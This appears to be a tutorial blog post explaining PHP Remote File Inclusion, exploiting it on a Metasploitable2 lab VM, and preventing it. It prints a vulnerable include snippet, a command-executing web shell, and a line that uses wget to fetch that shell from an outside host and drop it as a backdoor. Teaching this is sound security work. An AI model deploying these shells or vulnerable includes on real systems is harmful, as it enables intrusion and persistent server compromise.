RFI stands for Remote File Inclusion, this vulnerability allows an attacker to dynamically include files/scripts from remote/external sources into the web server. This vulnerability occurs due to poorly implemented security checks and sanitization. The successful exploitation of RFI vulnerability leads to remote code execution, Cross Site Scripting, Information disclosure etc. For example :
<?php $file = $_GET['file']; include($file); ?>
The above page takes file name as input and include that file.
But the above php code is vulnerable to RFI attack, and an attacker could easily include remote files and run it on the web server.
Now lets see an example of the attack. Also note that in php version 5 and above the
allow_url_include option is disabled by default, and in order to experiment with RFI you have to enable it.
In this example i am going to use Metasploitable2 VM. The download links are given below : Download Link.
And you also need to enable
allow_url_include option in Metasploitable2, to do that just open the file
/etc/php5/cgi/php.ini with nano or vi editor and in Line number 576
allow_url_include = Off
at above line change Off with On
allow_url_include = On
Our vulnerable page will take page name and include that page.
Now we try to include an external file from remote source.
File : shell.php
<?php $cmd = $_GET['cmd']; system($cmd); ?>
URL of php file is :
And in the web application, the url will be :
And as we can see the
ls command is successfully executed on the web server. We can also drop our backdoor file on the web server with below code
File : load.php
<?php shell_exec('wget http://192.168.56.1:8000/shell.php -O /var/www/shell.php') ?>
The above code will download shell.php and store it on
And after the above request, we can access our backdoor ‘shell.php’, with
Preventing Remote File Inclusion (RFI) vulnerability
The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included. We can also minimize the risk of RFI attacks through proper input validation and sanitization. it’s always preferable to sanitize user-supplied/controlled inputs to the best of your ability.
- These inputs include:
- GET/POST parameters
- URL parameters
- Cookie values
- HTTP header values
It is also recommended to implement validation mechanisms on the server side, because client side validation can be easily bypassed by using a proxy tool like burp suite, ZAP proxy etc.
Additionally, in the case of PHP, most modern PHP configurations are configured with
allow_url_include set to off, which would not allow an attacker to include remote files, but it still be vulnerable to Local File Inclusion attack.